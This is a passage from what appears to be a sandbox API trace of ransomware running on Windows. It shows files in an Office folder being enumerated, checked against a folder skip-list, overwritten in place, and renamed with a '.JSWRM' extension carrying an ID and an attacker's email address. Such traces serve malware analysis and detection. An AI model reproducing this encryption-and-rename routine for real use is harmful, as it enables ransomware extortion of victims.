returned -1 [0139.490] lstrcmpiW (lpString1="PEOPLEDATAHANDLER.DLL", lpString2="documents and settings") returned 1 [0139.490] lstrcmpiW (lpString1="PEOPLEDATAHANDLER.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.490] lstrcmpiW (lpString1="PEOPLEDATAHANDLER.DLL", lpString2="system volume information") returned -1 [0139.490] lstrcmpiW (lpString1="PEOPLEDATAHANDLER.DLL", lpString2="msocache") returned 1 [0139.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PEOPLEDATAHANDLER.DLL", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0139.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PEOPLEDATAHANDLER.DLL", cchWideChar=21, lpMultiByteStr=0x241268, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PEOPLEDATAHANDLER.DLL", lpUsedDefaultChar=0x0) returned 21 [0139.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PEOPLEDATAHANDLER.DLL", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0139.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PEOPLEDATAHANDLER.DLL", cchWideChar=21, lpMultiByteStr=0x2413a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PEOPLEDATAHANDLER.DLL", lpUsedDefaultChar=0x0) returned 21 [0139.490] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x831d63af, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x834f7581, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x55aa8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PerfBoost.exe", cAlternateFileName="PERFBO~1.EXE")) returned 1 [0139.490] lstrcmpiW (lpString1="PerfBoost.exe", lpString2=".") returned 1 [0139.490] lstrcmpiW (lpString1="PerfBoost.exe", lpString2="..") returned 1 [0139.490] lstrcmpiW (lpString1="PerfBoost.exe", lpString2="...") returned 1 [0139.490] lstrcmpiW (lpString1="PerfBoost.exe", lpString2="windows") returned -1 [0139.490] lstrcmpiW (lpString1="PerfBoost.exe", lpString2="recovery") returned -1 [0139.490] lstrcmpiW (lpString1="PerfBoost.exe", lpString2="perflogs") returned -1 [0139.490] lstrcmpiW (lpString1="PerfBoost.exe", lpString2="documents and settings") returned 1 [0139.490] lstrcmpiW (lpString1="PerfBoost.exe", lpString2="$RECYCLE.BIN") returned 1 [0139.490] lstrcmpiW (lpString1="PerfBoost.exe", lpString2="system volume information") returned -1 [0139.490] lstrcmpiW (lpString1="PerfBoost.exe", lpString2="msocache") returned 1 [0139.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PerfBoost.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PerfBoost.exe", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PerfBoost.exe", lpUsedDefaultChar=0x0) returned 13 [0139.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PerfBoost.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PerfBoost.exe", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PerfBoost.exe", lpUsedDefaultChar=0x0) returned 13 [0139.490] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b63f68c, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b63f68c, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b63f68c, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x32ea8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PJCALEND.DLL", cAlternateFileName="")) returned 1 [0139.491] lstrcmpiW (lpString1="PJCALEND.DLL", lpString2=".") returned 1 [0139.491] lstrcmpiW (lpString1="PJCALEND.DLL", lpString2="..") returned 1 [0139.491] lstrcmpiW (lpString1="PJCALEND.DLL", lpString2="...") returned 1 [0139.491] lstrcmpiW (lpString1="PJCALEND.DLL", lpString2="windows") returned -1 [0139.491] lstrcmpiW (lpString1="PJCALEND.DLL", lpString2="recovery") returned -1 [0139.491] lstrcmpiW (lpString1="PJCALEND.DLL", lpString2="perflogs") returned 1 [0139.491] lstrcmpiW (lpString1="PJCALEND.DLL", lpString2="documents and settings") returned 1 [0139.491] lstrcmpiW (lpString1="PJCALEND.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.491] lstrcmpiW (lpString1="PJCALEND.DLL", lpString2="system volume information") returned -1 [0139.491] lstrcmpiW (lpString1="PJCALEND.DLL", lpString2="msocache") returned 1 [0139.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PJCALEND.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PJCALEND.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PJCALEND.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PJCALEND.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PJCALEND.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PJCALEND.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.491] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc26397db, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc26397db, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc274482a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x902bb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0139.491] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2=".") returned 1 [0139.491] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="..") returned 1 [0139.491] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="...") returned 1 [0139.491] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="windows") returned -1 [0139.491] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="recovery") returned -1 [0139.491] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="perflogs") returned 1 [0139.491] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="documents and settings") returned 1 [0139.491] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0139.491] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="system volume information") returned -1 [0139.491] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="msocache") returned 1 [0139.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pkeyconfig-office.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0139.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pkeyconfig-office.xrm-ms", cchWideChar=24, lpMultiByteStr=0x2410d8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pkeyconfig-office.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0139.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pkeyconfig-office.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0139.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pkeyconfig-office.xrm-ms", cchWideChar=24, lpMultiByteStr=0x241330, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pkeyconfig-office.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0139.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0139.492] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=590523) returned 1 [0139.492] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.492] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0139.554] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.554] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0139.555] CloseHandle (hObject=0x45c) returned 1 [0139.555] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pkeyconfig-office.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\pkeyconfig-office.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pkeyconfig-office.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.557] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc6030bfe, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd95b0a45, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd97c6b3b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1c40b0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="POWERPNT.EXE", cAlternateFileName="")) returned 1 [0139.557] lstrcmpiW (lpString1="POWERPNT.EXE", lpString2=".") returned 1 [0139.557] lstrcmpiW (lpString1="POWERPNT.EXE", lpString2="..") returned 1 [0139.557] lstrcmpiW (lpString1="POWERPNT.EXE", lpString2="...") returned 1 [0139.557] lstrcmpiW (lpString1="POWERPNT.EXE", lpString2="windows") returned -1 [0139.557] lstrcmpiW (lpString1="POWERPNT.EXE", lpString2="recovery") returned -1 [0139.557] lstrcmpiW (lpString1="POWERPNT.EXE", lpString2="perflogs") returned 1 [0139.557] lstrcmpiW (lpString1="POWERPNT.EXE", lpString2="documents and settings") returned 1 [0139.558] lstrcmpiW (lpString1="POWERPNT.EXE", lpString2="$RECYCLE.BIN") returned 1 [0139.558] lstrcmpiW (lpString1="POWERPNT.EXE", lpString2="system volume information") returned -1 [0139.558] lstrcmpiW (lpString1="POWERPNT.EXE", lpString2="msocache") returned 1 [0139.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT.EXE", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POWERPNT.EXE", lpUsedDefaultChar=0x0) returned 12 [0139.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT.EXE", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POWERPNT.EXE", lpUsedDefaultChar=0x0) returned 12 [0139.558] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc6030bfe, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc6030bfe, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc6ac53aa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xfe0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="powerpnt.exe.manifest", cAlternateFileName="POWERP~1.MAN")) returned 1 [0139.558] lstrcmpiW (lpString1="powerpnt.exe.manifest", lpString2=".") returned 1 [0139.558] lstrcmpiW (lpString1="powerpnt.exe.manifest", lpString2="..") returned 1 [0139.558] lstrcmpiW (lpString1="powerpnt.exe.manifest", lpString2="...") returned 1 [0139.558] lstrcmpiW (lpString1="powerpnt.exe.manifest", lpString2="windows") returned -1 [0139.558] lstrcmpiW (lpString1="powerpnt.exe.manifest", lpString2="recovery") returned -1 [0139.558] lstrcmpiW (lpString1="powerpnt.exe.manifest", lpString2="perflogs") returned 1 [0139.558] lstrcmpiW (lpString1="powerpnt.exe.manifest", lpString2="documents and settings") returned 1 [0139.558] lstrcmpiW (lpString1="powerpnt.exe.manifest", lpString2="$RECYCLE.BIN") returned 1 [0139.558] lstrcmpiW (lpString1="powerpnt.exe.manifest", lpString2="system volume information") returned -1 [0139.558] lstrcmpiW (lpString1="powerpnt.exe.manifest", lpString2="msocache") returned 1 [0139.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="powerpnt.exe.manifest", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0139.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="powerpnt.exe.manifest", cchWideChar=21, lpMultiByteStr=0x241038, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powerpnt.exe.manifest", lpUsedDefaultChar=0x0) returned 21 [0139.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="powerpnt.exe.manifest", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0139.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="powerpnt.exe.manifest", cchWideChar=21, lpMultiByteStr=0x2410d8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powerpnt.exe.manifest", lpUsedDefaultChar=0x0) returned 21 [0139.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\powerpnt.exe.manifest" (normalized: "c:\\program files\\microsoft office\\root\\office16\\powerpnt.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0139.559] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=4064) returned 1 [0139.559] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.560] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0xfe0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0xfe0, lpOverlapped=0x0) returned 1 [0139.561] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.561] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0xfe0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0xfe0, lpOverlapped=0x0) returned 1 [0139.562] CloseHandle (hObject=0x45c) returned 1 [0139.562] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\powerpnt.exe.manifest" (normalized: "c:\\program files\\microsoft office\\root\\office16\\powerpnt.exe.manifest"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\powerpnt.exe.manifest.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\powerpnt.exe.manifest.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.563] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x215db4dd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="POWERPNT.VisualElementsManifest.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0139.563] lstrcmpiW (lpString1="POWERPNT.VisualElementsManifest.xml", lpString2=".") returned 1 [0139.563] lstrcmpiW (lpString1="POWERPNT.VisualElementsManifest.xml", lpString2="..") returned 1 [0139.563] lstrcmpiW (lpString1="POWERPNT.VisualElementsManifest.xml", lpString2="...") returned 1 [0139.563] lstrcmpiW (lpString1="POWERPNT.VisualElementsManifest.xml", lpString2="windows") returned -1 [0139.563] lstrcmpiW (lpString1="POWERPNT.VisualElementsManifest.xml", lpString2="recovery") returned -1 [0139.563] lstrcmpiW (lpString1="POWERPNT.VisualElementsManifest.xml", lpString2="perflogs") returned 1 [0139.563] lstrcmpiW (lpString1="POWERPNT.VisualElementsManifest.xml", lpString2="documents and settings") returned 1 [0139.563] lstrcmpiW (lpString1="POWERPNT.VisualElementsManifest.xml", lpString2="$RECYCLE.BIN") returned 1 [0139.563] lstrcmpiW (lpString1="POWERPNT.VisualElementsManifest.xml", lpString2="system volume information") returned -1 [0139.563] lstrcmpiW (lpString1="POWERPNT.VisualElementsManifest.xml", lpString2="msocache") returned 1 [0139.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT.VisualElementsManifest.xml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0139.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT.VisualElementsManifest.xml", cchWideChar=35, lpMultiByteStr=0x22d0d8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POWERPNT.VisualElementsManifest.xml", lpUsedDefaultChar=0x0) returned 35 [0139.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT.VisualElementsManifest.xml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0139.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT.VisualElementsManifest.xml", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POWERPNT.VisualElementsManifest.xml", lpUsedDefaultChar=0x0) returned 35 [0139.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.VisualElementsManifest.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\powerpnt.visualelementsmanifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0139.565] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=344) returned 1 [0139.565] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.565] ReadFile (in: hFile=0x45c, lpBuffer=0x21c578, nNumberOfBytesToRead=0x150, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesRead=0x345ec04*=0x150, lpOverlapped=0x0) returned 1 [0139.566] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.566] WriteFile (in: hFile=0x45c, lpBuffer=0x21c578*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesWritten=0x345ec00*=0x150, lpOverlapped=0x0) returned 1 [0139.566] CloseHandle (hObject=0x45c) returned 1 [0139.566] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.VisualElementsManifest.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\powerpnt.visualelementsmanifest.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.VisualElementsManifest.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\powerpnt.visualelementsmanifest.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.567] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc6030bfe, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd95d6d40, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9d24004, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1178848, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PPCORE.DLL", cAlternateFileName="")) returned 1 [0139.567] lstrcmpiW (lpString1="PPCORE.DLL", lpString2=".") returned 1 [0139.567] lstrcmpiW (lpString1="PPCORE.DLL", lpString2="..") returned 1 [0139.567] lstrcmpiW (lpString1="PPCORE.DLL", lpString2="...") returned 1 [0139.567] lstrcmpiW (lpString1="PPCORE.DLL", lpString2="windows") returned -1 [0139.567] lstrcmpiW (lpString1="PPCORE.DLL", lpString2="recovery") returned -1 [0139.567] lstrcmpiW (lpString1="PPCORE.DLL", lpString2="perflogs") returned 1 [0139.567] lstrcmpiW (lpString1="PPCORE.DLL", lpString2="documents and settings") returned 1 [0139.567] lstrcmpiW (lpString1="PPCORE.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.567] lstrcmpiW (lpString1="PPCORE.DLL", lpString2="system volume information") returned -1 [0139.568] lstrcmpiW (lpString1="PPCORE.DLL", lpString2="msocache") returned 1 [0139.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPCORE.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0139.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPCORE.DLL", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, 